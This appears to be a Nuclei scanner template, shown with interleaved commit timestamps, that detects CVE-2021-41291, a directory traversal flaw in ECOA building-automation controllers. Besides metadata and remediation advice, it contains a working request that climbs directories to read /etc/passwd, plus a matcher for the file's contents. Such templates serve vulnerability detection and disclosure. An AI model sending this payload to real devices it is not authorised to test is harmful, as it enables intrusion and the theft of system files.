2021-10-14 14:38:44 +00:00
id : CVE-2021-41291
2021-09-24 23:58:58 +00:00
info :
name : ECOA Building Automation System - Directory Traversal Content Disclosure
author : gy741
severity : high
2022-05-17 09:18:12 +00:00
description : The ECOA BAS controller suffers from a directory traversal content disclosure vulnerability. Using the GET parameter cpath in File Manager (fmangersub), attackers can disclose directory content on the affected device
2023-09-27 15:51:13 +00:00
impact : |
An attacker can exploit this vulnerability to access sensitive files and directories, potentially exposing sensitive information.
2023-09-06 12:09:01 +00:00
remediation : |
Apply the latest security patches or updates provided by the vendor to fix the directory traversal vulnerability in the ECOA Building Automation System.
2021-10-14 14:20:43 +00:00
reference :
2022-03-06 17:04:24 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2021-41291
2021-10-14 12:59:38 +00:00
- https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5670.php
- https://www.twcert.org.tw/en/cp-139-5140-6343c-2.html
2022-05-17 09:18:12 +00:00
- https://www.twcert.org.tw/tw/cp-132-5127-3cbd3-1.html
2021-10-14 14:40:51 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
2022-04-22 10:38:41 +00:00
cvss-score : 7.5
2021-10-14 14:40:51 +00:00
cve-id : CVE-2021-41291
cwe-id : CWE-22
2023-12-12 11:07:52 +00:00
epss-score : 0.03741
2024-01-14 13:49:27 +00:00
epss-percentile : 0.90901
2023-09-06 12:09:01 +00:00
cpe : cpe:2.3:o:ecoa:ecs_router_controller-ecs_firmware:-:*:*:*:*:*:*:*
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2023-07-11 19:49:27 +00:00
vendor : ecoa
product : ecs_router_controller-ecs_firmware
2024-01-14 09:21:50 +00:00
tags : cve2021,cve,ecoa,lfi,traversal
2021-09-24 23:58:58 +00:00
2023-04-27 04:28:59 +00:00
http :
2021-09-24 23:58:58 +00:00
- raw :
- |
2021-09-25 05:52:48 +00:00
GET /fmangersub?cpath=../../../../../../../etc/passwd HTTP/1.1
2021-09-24 23:58:58 +00:00
Host : {{Hostname}}
matchers :
2021-09-25 05:52:48 +00:00
- type : regex
regex :
2022-01-04 19:34:16 +00:00
- "root:.*:0:0:"
2024-01-26 08:31:11 +00:00
# digest: 4a0a0047304502207f8b0908b97ff22a89570504251e0836c8b463840c12b998c3766012a1d119a4022100b3627c4c9891d062199b46f969ac720a58088e0472f1ed7e0b44c762688f5cc8:922c64590222798bb761d5b6d8e72950